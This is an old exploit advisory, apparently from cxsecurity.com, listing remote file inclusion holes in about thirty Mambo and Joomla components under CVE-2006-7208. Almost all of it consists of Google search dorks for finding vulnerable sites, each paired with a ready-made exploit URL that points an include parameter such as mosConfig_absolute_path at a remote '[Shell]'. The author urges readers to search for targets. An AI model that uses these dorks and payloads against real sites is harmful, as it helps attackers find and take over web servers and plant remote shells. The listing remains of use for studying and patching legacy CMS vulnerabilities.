All Of the Mambo & Joomla Script Remote File Inclussion Bugs..

2007.06.28
Credit: SPYMETA
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-7208
CWE: CWE-20


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Hi every body... There are some Remote File Inclussion bugs on Mamabo & Joomla Script... You can search ; ex: inurl:[Dork] , [dork], allinurl:[dork] on google or the other search sites.. Dork: com_comprofiler Expl: administrator/components/com_comprofiler/plugin.class.php?mosConfig_abso lute_path=[Shell] Dork: inurl:com_multibanners Expl: /administrator/components/com_multibanners/extadminmenus.class.php?mosCo nfig_absolute_path=[Shell] Dork: inurl:com_colophon expl: administrator/components/com_colophon/admin.colophon.php?mosConfig_absol ute_path=[Shell] Dork: inurl:index.php?option=[Shell]com_simpleboard Expl: /components/com_simpleboard/file_upload.php?sbp=[Shell] Dork: inurl:"com_hashcash" Expl: /components/com_hashcash/server.php?mosConfig_absolute_path=[Shell] - Dork: inurl:"com_htmlarea3_xtd-c" Expl: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosCo nfig_absolute_path=[Shell] - Dork: inurl:"com_sitemap" Expl: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell] -- Dork: inurl:"com_forum" Expl: /components/com_forum/download.php?phpbb_root_path=[Shell] -- Dork: inurl:"com_pccookbook" Expl: /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell ] Dork: inurl:index.php?option=[Shell]com_extcalendar Expl: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[She ll] Dork: inurl:"minibb" Expl: /components/minibb/index.php?absolute_path=[Shell] - Dork: inurl:"com_smf" Expl: /components/com_smf/smf.php?mosConfig_absolute_path=[Shell] Expl: /modules/mod_calendar.php?absolute_path=[Shell] Dork: inurl:"com_pollxt" Expl: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_loudmounth" Expl: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolu te_path=[Shell] - Dork: inurl:"com_videodb" Expl: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_pa th=[Shell] Dork: inurl:index.php?option=[Shell]com_pcchess Expl: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[She ll] Dork: inurl:"com_multibanners" Expl: /administrator/components/com_multibanners/extadminmenus.class.php?mosCo nfig_absolute_path=[Shell] Dork: inurl:"com_a6mambohelpdesk" Expl: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php? mosConfig_live_site=[Shell] Dork: inurl:"com_colophon" Expl: /administrator/components/com_colophon/admin.colophon.php?mosConfig_abso lute_path=[Shell] Dork: inurl:"com_mgm" Expl: /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[ Shell] Dork: inurl:"com_mambatstaff" Expl: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[She ll] Dork: inurl:"com_securityimages" Expl: /components/com_securityimages/configinsert.php?mosConfig_absolute_path= [Shell] Expl: /components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_artlinks" Expl: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[S hell] - Dork: inurl:"com_galleria" Expl: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shel l] by SPYMETA Mail & MSN : spymeta (at) yahoo (dot) com [email concealed]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top